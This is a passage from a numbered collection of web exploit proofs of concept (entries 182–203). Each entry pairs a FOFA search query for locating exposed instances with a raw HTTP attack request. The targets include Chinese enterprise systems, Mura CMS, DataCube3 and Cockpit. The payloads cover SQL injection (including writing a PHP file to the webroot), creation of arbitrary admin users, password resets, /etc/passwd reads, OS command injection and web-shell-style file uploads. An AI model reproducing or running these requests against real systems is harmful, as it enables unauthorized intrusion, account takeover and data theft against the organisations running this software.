POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system used in photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd


191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=


192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}


193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


199. cockpit system assetsmanager_upload endpoint file upload

1. Run the PoC to obtain the CSRF information, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--


/storage/uploads/tttt.php

200. SeaCMS海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1


202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--